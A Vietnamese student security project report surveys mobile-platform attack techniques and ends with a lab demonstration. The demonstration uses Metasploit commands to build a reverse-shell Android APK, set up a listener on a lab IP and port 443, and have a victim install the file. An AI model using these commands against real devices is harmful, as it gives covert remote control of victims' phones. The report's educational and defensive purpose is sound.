Tải bản đầy đủ (.docx) (15 trang)

Tìm Hiểu Một Số Kỹ Thuật Tấn Công Điện Thoại Di Động

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (1.7 MB, 15 trang )

TRƯỜNG CAO ĐẲNG CNTT HỮU NGHỊ VIỆT – HÀN
KHOA CÔNG NGHỆ THÔNG TIN

ĐỒ ÁN MÔN AN NINH MẠNG
ĐỀ TÀI

TÌM HIỂU MỘT SỐ KĨ THUẬT TẤN CÔNG
THIẾT BỊ ĐIỆN THOẠI DI ĐỘNG

GVHD:

Th.S Lê Tự Thanh

NHÓM 4:

Trần Văn Lợi
Huỳnh Thanh Cường

LỚP:

CCMM07A

Đà Nẵng, ngày 15 tháng 3 năm 2015


MỤC LỤC

2


DANH MỤC HÌNH



3


LỜI NÓI ĐẦU
Thế kỉ XXI, song song với tốc độ phát triển đến chóng mặt của lĩnh vực công
nghệ thông tin thì phát triển ứng dụng, thiết bị di động trở thành xu hướng hợp thời.
Hiện nay, trên thế giới đời sống kinh tế tăng cao nhu cầu sử dụng công nghệ của con
người ngày càng lớn với nhiều mục đích khác nhau. Do đó, theo thống kê của IDC, chỉ
tính riêng khu vực Châu Á – Thái Bình Dương trong quý 2/2014, đã có 13,8 triệu thiết
bị di động được sản xuất và tiêu thụ ở khu vực. Năm 2014, riêng trong vòng 1 quý, tốc
độ tăng trưởng sản xuất và tiêu thụ smartphone đã tăng từ 16-24%, dẫn đến yêu cầu
phát triển ứng dụng trên thiết bị di động như vũ bão. Cơn sốt smartphone khiến tất cả
các doanh nghiệp sản xuất ứng dụng phải giải quyết bài toán lập trình nên các ứng
dụng vừa đẹp, vừa tiện dụng, vừa hay, phù hợp với thị hiếu và nhu cầu của người
dùng. Smartphone trở thành vật bất ly thân với rất nhiều người vì khả năng sử dụng
linh hoạt của nó hoặc hầu hết người dùng thường lưu danh bạ, tin nhắn, email hay hình
ảnh mà thậm chí có thể là những thông tin tài chính cá nhân hay những tài liệu công
việc quan trọng trong điện thoại. Và hơn hết, chúng ta đang sống trong một thế giới
nơi mọi thứ đều kết nối với nhau, smartphone là công cụ có thể liên tục theo dõi vị trí
của người dùng để lập ra một hồ sơ chi tiết những địa điểm mà họ thường đến. Do vậy,
smartphone trở thành mục tiêu tối quan trọng cho các hacker, thực tế cho thấy các thiết
bị di động smartphone sử dụng các hệ điều hành như iOS, Android, Blackbarry,... đang
là mục tiêu tấn công của nhiều hacker thông qua phần mềm độc hại. Theo hãng bảo
mật NetQin(Trung Quốc) cho hay: Nữa đầu năm 2012, hãng này phát hiện 17676
chương trình phần mềm độc hại trên smartphone tăng gấp 42% so với 6 tháng cuối
năm 2011. Trong một báo cáo chi tiết bảo mật di động trên thế giới, các công ty phát
hiện khoảng 3,7 triệu điện thoại bị nhiễm phần mềm độc hại đa phần dành cho
Android chiếm 78% chỉ trong một tháng, phần còn lại là trên hệ điều hành Symbian
của Nokia. Phần mềm độc hại được phát hiện nhiều nhất ở Trung Quốc, Nga, Mỹ.

Đây là lí do nhóm chúng em lựa chọn “Tìm Hiểu Một Số Kỹ Thuật Tấn Công
Thiết Bị Điện Thoại Di Động” làm đề tài đố án môn An Ninh Mạng.
Qua đây, nhóm chúng em xin được gửi lời cảm ơn chân thành đến thầy Lê Tự
Thanh đã tận tình hướng dẫn, giúp đỡ, định hướng cho nhóm thực hiện thành công đề
tài này!

4


Chương I: GIỚI THIỆU TỔNG QUAN VỀ AN NINH MẠNG
1.1.

Giới thiệu An ninh mạng
An ninh mạng là lĩnh vực có nhiệm vụ bảo vệ các thông tin cá nhân và
những hoạt động liên quan đến chiếc máy tính bằng cách phát hiện, ngăn chặn
và ứng phó với các cuộc tấn công từ bên ngoài; bảo vệ hệ thống mạng không bị
phá hoại về phần cứng hay chỉnh sửa dữ liệu; cung cấp giải pháp, chính sách
bảo vệ máy tính, hệ thống mạng nhằm ngăn cản người dùng trái phép hay mã
độc hại xâm nhập vào.
Các yếu tố cần bảo vệ:
-

Dữ liệu.

-

Tài nguyên hệ thống.

-


Danh tiếng của dữ liệu khi bị đánh cắp.

1.2.

Tình hình An ninh mạng thế giới
Tình hình an ninh mạng trên thế giới trở nên khó lườn hơn bao giờ hết. Lực
lượng tội phạm mạng ngày càng đông đảo, tinh vi gây ra vô vàng trở ngại trong
việc bảo mật, thiệt hại lớn trên thế giới. Theo thống kê của trung tâm Nghiên
cứu Chiến lược và Quốc tế(CSIS) Hoa Kì, tổng thiệt hại của cả thế giới ước đạt
445 tỷ USD. Thế giới đã chứng kiến nhiều website của các tên tuổi tập đoàn lớn
cũng từng bị hacker tấn công gây hậu quả lớn như JP Morgan, Bank of
America, Citigroup, Ebay.

1.3.

Tình hình An ninh mạng Việt Nam
Tình hình an toàn, an ninh mạng tại Việt Nam tiếp tục diễn biến phức tạp,
tồn tại nhiều cơ sở gây nguy cơ bị tấn công, phá hoại hạ tầng mạng thông tin,
ảnh hưởng tới an ninh quốc gia.
Từ báo cáo của Kaspersky và Symantec cho thấy, Việt Nam đứng thứ 3
(3,96%) sau Nga (40%) và Ấn Độ (8%) về số dùng di động bị mã độc tấn công
nhiều nhất trên thế giới, thứ 6 trên thế giới về số lượng địa chỉ IP trong nước
được dùng trong các mạng máy tính ma tấn công nước khác; thứ 7 trên thế giới
về phát tán tin nhắn rác (giảm 1 bậc so tháng 11/2013) và đứng thứ 12 trên thế
giới về các hoạt động tấn công mạng.
Riêng năm 2014, Bộ Công an phát hiện gần 6.000 trang bị tấn công, chiếm
quyền quản trị, chỉnh sửa nội dung (có 246 trang tên miền gov.vn). Đặc biệt,
sau sự kiện giàn khoan HD 981 hạ đặt trái phép trong vùng đặc quyền kinh tế
Việt Nam, tin tặc nước ngoài đã tấn công hơn 700 trang mạng Việt Nam và hơn
400 trang trong dịp Quốc khánh (2/9) để chèn các nội dung xuyên tạc chủ

quyền của Việt Nam với quần đảo Hoàng Sa . Có 220 website của Việt Nam đã
bị Hacker Trung Quốc tấn công.
Vào cuối năm 2014, tin tặc cũng đã mở đợt tấn công vào trung tâm dữ liệu
của VCCorp khiến nhiều tờ báo mà công ty này đang vận hành kỹ thuật như
Dân trí, Người lao động, Soha, VNEconomy, Kenh14… bị tê liệt.
5


Theo khảo sát của Bkav, 12/2014, người dùng Việt Nam tổn thất thiệt hại lên
đến 8.500 tỷ đồng do các sự cố từ virus máy tính, chiếm 1% tổng thiệt hại của
thế giới.
Các cuộc tấn công chủ yếu đến từ:

1.4.

-

Tin nhắn rác

-

Wifi miễn phí ở Việt Nam

-

Làm máy tính nhiễm virus từ USB

-

Các ứng dụng giã mạo trên di động


-

Mã độc

-

DDoS

Tình hình An ninh mạng trên các thiết bị di động
Theo hãng bảo mật NetQin(Trung Quốc) cho hay: Nữa đầu năm 2012, hãng
này phát hiện 17676 chương trình phần mềm độc hại trên smartphone tăng gấp
42% so với 6 tháng cuối năm 2011. Trong một báo cáo chi tiết bảo mật di động
trên thế giới, các công ty phát hiện khoảng 3,7 triệu điện thoại bị nhiễm phần
mềm độc hại đa phần dành cho Android chiếm 78% chỉ trong một tháng, phần còn
lại là trên hệ điều hành Symbian của Nokia. Phần mềm độc hại được phát hiện
nhiều nhất ở Trung Quốc, Nga, Mỹ.

Chương II TÌM HIỂU MỘT SỐ KỸ THUẬT TẤN CÔNG
THIẾT BỊ ĐIỆN THOẠI DI ĐỘNG

6


2.1 Hacking Android iOS
Android là một đống phần mềm được phát triển bởi Google riêng cho thiết bị di
động như điện thoại thông minh và máy tính bảng. Nó bao gồm một hệ thống điều
hành, middleware và các ứng dụng quan trọng. hệ điều hành di động Android được
dựa trên nhân Linux. Các ứng dụng Android chạy trong một sandbox.
Các tính năng của hệ điều hành Android bao gồm:

-

-

Khung ứng dụng cho phép tái sử dụng và thay thế linh kiện.
Máy ảo Dalvik được tối ưu hóa cho các thiết bị di động.
Tích hợp trình duyệt dựa trên các công cụ WebKit mã nguồn mở.
SQLite để lưu trữ dữ liệu © Truyền thông hỗ trợ cấu trúc cho âm thanh phổ
biến, video, và vẫn còn các định dạng hình ảnh (MPEG4, H.264, MP3,
AAC, AMR, JPG, PNG, GIF).
Môi trường phát triển phong phú bao gồm một trình giả lập thiết bị, công cụ
để gỡ lỗi, bộ nhớ và hiệu suất profiling, và một plugin cho Eclipse IDE.

Cấu trúc hệ điều hành Android:

Hình 1.1 Cấu trúc hệ điều hành Android

7


Một số kĩ thuật tấn công Thiết bị di động Android:
2.2 Hacking iOS:
iOS là một hệ điều hành điện thoại di động được phát triển bởi Apple và phân phối
độc quyền cho phần cứng của Apple. Ban đầu, iOS được công bố năm 2007
cho iPhone, sau đó được mở rộng để hỗ trợ các thiết bị khác của Apple như iPod
Touch (tháng 9 năm 2007), iPad (tháng 1 năm 2010), iPad Mini (tháng 11 năm 2012)
và thế hệ thứ hai của Apple Ttivi trở đi (tháng 9 năm 2010).
Đến cuối năm 2011, iOS chiếm 60% thị phần điện thoại thông minh và máy tính bảng.
Cuối năm 2012, iOS chiếm 21% thị phần hệ điều hành điện thoại thông minh trên thị
trường và 43,6% thị trường hệ điều hành máy tính bảng. Và đến tháng 6 năm 2014,

App Store của Apple chứa hơn 1.200.000 ứng dụng iOS, và được tải về hơn 60 tỷ lần.
Kĩ thuật tấn công Thiết bị di động iOS:
Jailbreaking là một phương pháp của việc kiểm soát của hệ điều hành iOS được
sử dụng trên các thiết bị của Apple. Nó làm giãn các thiết bị từ những rào cản của sự
phụ thuộc vào các ứng dụng mã nguồn độc quyền của Apple và cho phép người dùng
sử dụng các ứng dụng của bên thứ ba không có sẵn tại các cửa hàng ứng dụng chính
thức. Nó được thực hiện bằng cách cài đặt một bộ sửa đổi của các bản vá lỗi kernel
cho phép bạn chạy các ứng dụng của bên thứ ba không có chữ ký của các nhà cung cấp
hệ điều hành. Nó được sử dụng để thêm nhiều chức năng hơn cho các tiện ích của
Apple chuẩn. Nó cũng có thể cung cấp quyền truy cập root vào hệ thống điều hành và
cho phép tải về các ứng dụng của bên thứ ba, chủ đề, phần mở rộng, vv Điều này loại
bỏ các hạn chế sandbox, cho phép các ứng dụng độc hại để truy cập tài nguyên di động
hạn chế và thông tin.
Khi Jailbreak sẽ hình thành rủi ro khác cho thiết bị của bạn bao gồm:
-

Bãi bỏ bảo hành của điện thoại của bạn.
Hiệu suất kém.
Bricking thiết bị.
Nhiễm phần mềm độc hại.

2.3 Hacking Windows Phone OS
Windows Phone 8 là hệ điều hành thế hệ thứ hai được phát triển bởi Microsoft cho
Windows Phone.
Đặc điểm quan trọng của Windows Phone 8:
-

-

Nó cho phép các thiết bị có màn hình lớn hơn và bộ vi xử lý đa lõi lên tới 64

lõi.
Thành phần cốt lõi của Windows 8, bao gồm cả hạt nhân, hệ thống tập tin,
trình điều khiển, mạng stack, các thành phần an ninh, phương tiện truyền
thông và hỗ trợ đồ họa.
Internet Explorer 10, công nghệ bản đồ của Nokia, và nền đa nhiệm.
Hỗ trợ mã nguồn gốc (C và C ++), đơn giản hóa porting từ các nền tảng như
Android, Symbian, và iOS.
8


-

Nhà cung cấp kiểm soát và xây dựng thương hiệu của nguyên tố "ví tiền" là
có thể thông qua SIM hoặc phần cứng điện thoại.
Unified Extensible Firmware Interface (UEFI) giao thức khởi động an toàn
và Firmware qua mạng không cho cập nhật Windows Phone.
Cải thiện hỗ trợ cho lưu trữ di động và chia sẽ tin cậy.

Hình 1.2 Cấu trúc Windows Phone
2.4 Hacking BlackBerry
BlackBerry OS là một hệ điều hành điện thoại di động độc quyền được phát triển
bởi Research In Motion (RIM) cho dòng BlackBerry của điện thoại thông minh và các
thiết bị cầm tay.
Để tấn công hệ điều hành BlackBerry chúng ta sẽ khai thác Dịch Vụ Tin Nhắn
Ngắn - Short Message Service (SMS).
Một số kỹ thuật như:
-

SMS Backdoor.
Khai thác Email.

Phần mềm gián điệp FinSpy Mobile.

9


Chương III:
MÔ PHỎNG KỸ THUẬT TẤN CÔNG NỀN TẢNG DI ĐỘNG
3.1 Mô phỏng hacking Android OS
3.1.1 Chuẩn bị:
+ 1 máy ảo cài hệ điều hành kali linux
+ 1 máy cài android 4.4
3.1.2 Thông tin ban đầu:
+ Địa chỉ IP máy tấn công 192.168.159.132
+ Cổng nhận kết nôi 443
3.1.3 Các bước tiến hành:
Bước 1: trong cửa sổ terminal của máy ảo kali linux tạo 1 file
huynhthanhcuong.apk
Bằng lệnh “msfpayload android/merterpreter/reverse_tcp lhost = <Địa chỉ IP của
máy tấn công> lport <Cổng nhận kết nối > R > < tên file .apk>”
(sử dụng khung tải trọng Metasploit để khai thác)

Hình 3.1 tạo file apk với tên huynhthanhcuong.

10


Bước 2: Gõ msfconsole đến đến giao diện điều khiển Metasploit

Hình 3.2 giao diện Metasploit
Bước 3: Vì tải trọng ban đầu là reverse_tcp nơi kẻ tấn công mong đợi các nạn nhân để

kết nối với máy tấn công,máy tấn công phải thiết lập xử lý để xử lý những kết nối vào
cổng đã được quy định ở trên.
Gõ lệnh :
Use exploit/multi/handler ( sử dụng bộ xử lý Metasploit , khai thác đa xử lý).
Set payload android/meterpreter/reverse_tcp ( Đảm bảo tải trọng trùng với bước 1 ).
Bước 4: Cấu hình chuyển đổi cho các tải trọng Metasploit , đã xác định trong bước 3.
Gõ lệnh:
Set lhost 192.168.159.132 (Địa chỉ IP máy tấn công).
Set lport 443 (Cổng lắng nghe các kết nối đảo ngược).
Exploit (Bắt đầu lắng nghe kết nối).

11


Hình 3.3 sử dụng khai thác đa xử lý và cấu hình chuyển đổi các tải trọng Metasploit
Bước 5: Chia sẽ file với đuôi apk vừa tạo lên internet để cho máy nạn nhân tải và cài
vào máy.

Hình 3.4 Giao diện của máy ảo chạy hệ điều hành android.
12


Hình 3.5 Giao diện máy ảo chạy hệ điều hành android khi đã kích hoạt file
huynhthanhcuong.apk

Hình 3.6 Máy tấn công đã nhận kết nối từ máy nạn nhân

13



Tới đây máy tấn công đã được bên trong nạn nhân là điện thoại android , có thể làm
mọi thứ với điện thoại của nạn nhân.

Hình 3.7 Danh sách các thư mục trong máy điện thoại Android.

14


Hình 3.8 Thực hiện download file huynhthanhcuong.apk trong thư mục download của
máy Android
3.2 Kết luận
- Không nên cài đặt file Apk từ nguồn không rõ.
- Nếu thật sự muốn cài file Apk từ nguồn không rõ thì phải xem và kiểm tra mã nguồn

(Mã nguồn tham khảo tại Hacking - tutorial .com)

Tài Liệu Tham Khảo
[1] Bộ CEHv8 Module 16 Hacking Mobile Platforms, Module 16- Hacking Mobile
Platforms
[2] />
15



×